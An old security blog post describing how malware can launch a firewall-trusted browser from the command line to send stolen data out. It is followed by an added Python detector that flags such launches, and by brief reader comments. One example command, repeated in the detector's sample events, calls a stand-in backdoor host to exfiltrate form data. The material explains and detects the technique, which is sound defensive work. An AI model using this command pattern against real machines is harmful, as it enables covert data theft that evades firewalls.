Beng Hacks: Command-line Internet access

Tuesday, March 11, 2008

Everyone who has half a brain uses a firewall. Even M$ gave you a free (but kinda useless) firewall called Windows Firewall (or Windows Defender on Vista). However, most software firewalls like ZoneAlarm are application firewalls first, meaning they block or allow traffic based on which application is trying to get access. What are the first applications you allow through the firewall? IEXPLORE.EXE (Windows Internet Explorer), FIREFOX.EXE (Mozilla Firefox) and OPERA.EXE (Opera).

Did you know it's possible to use these EXEs to access the internet without you knowing? No popup, no fancy GUI window, nothing. And because your firewall already allows them, you don't even know the internet is being accessed.

For example: C:\Progra~1\Intern~1\iexplore.exe http://mybackdoorhost.domain.com/formcollector.php?name=value&

This will fire up IEXPLORE from the command line and access a web form on my website to dump data. If I had a trojan on your PC, my EXE need only fire this up on the command line to grab info from you. No need to learn how to code for HTTP, FTP, etc., just use IEXPLORE, and best part: since you already allow it access through the firewall, I dun even need to worry about hooking and stuff.

Wonderful right? Think you're safe? Think again!!

So what's the solution here? Hard to say really. How do you block a possible trojan like this yet still allow yourself internet access? You can't say dun use iexplore, use firefox instead, cuz the trojan can try both. Frankly, the IT systems we normal people use today (Windows OS) are totally inadequate to prevent such attacks. All of us are vulnerable to this, regardless, unless you tell me you dun use internet.

One possible solution is to change your internet surfing habits. Use an old PC, run Linux or Mac, and use that for Internet surfing, your personal email and the confidential info stuff, AND dun ever ever download files or plug thumbdrives into that PC. Then you have another PC for your online gaming and chat and stuff. It only lessens the damage, but it still lessens it.

How about Vista? Sadly I dunno, but I suspect UAC on Vista *can* help in this regard. Still exploring it on my *ahem* copy, keep you posted.
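
One way a defender can spot the pattern described in this post, as an added example (not the blog author's code): flag a browser that is started with a URL argument by a parent process other than the desktop shell. The event field names, the parent allow-list and the sample events are assumptions constructed for illustration.

```python
import ntpath
from urllib.parse import urlsplit, parse_qsl

BROWSERS = {"iexplore.exe", "firefox.exe", "opera.exe"}  # the three named in the post
# Assumption: parents a user normally starts a browser from. Tune per site
# (mail or chat clients that open links also pass a URL on the command line).
INTERACTIVE_PARENTS = {"explorer.exe"} | BROWSERS

def url_args(command_line):
    """Return the http(s) URLs passed as command-line arguments."""
    tokens = (t.strip('"') for t in command_line.split())
    return [t for t in tokens if t.lower().startswith(("http://", "https://"))]

def review(event):
    """Return reasons a process-creation event matches the pattern; [] if none."""
    image = ntpath.basename(event["image"]).lower()
    parent = ntpath.basename(event["parent_image"]).lower()
    urls = url_args(event["command_line"])
    if image not in BROWSERS or not urls or parent in INTERACTIVE_PARENTS:
        return []
    reasons = [f"{image} started with a URL by {parent}"]
    for url in urls:
        parts = urlsplit(url)
        if parse_qsl(parts.query, keep_blank_values=True):
            reasons.append(f"URL carries query data to {parts.hostname}")
    return reasons

# Constructed sample events; field names and the parent path are hypothetical.
IE = r"C:\Progra~1\Intern~1\iexplore.exe"
SAMPLE_EVENTS = [
    {"image": IE, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": IE},
    {"image": IE, "parent_image": r"C:\Temp\updater.exe",
     "command_line": IE + " http://mybackdoorhost.domain.com/formcollector.php?name=value&"},
    {"image": IE, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": IE + " http://example.com/"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ntpath.basename(ev["parent_image"]), "->", review(ev) or "not flagged")
```

Only the second event is flagged: the firewall sees an allowed browser, but the process-creation record shows who started it and what URL it was handed.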

2 Comments:

Anonymous said...

What about malware removal/protection software?

8:09 PM  
Blogger Beng Hacks said...

What about it? How is Internet Explorer considered malware?

Remember the cardinal rule of protection software: it protects you based on *known* signatures.

7:54 PM  
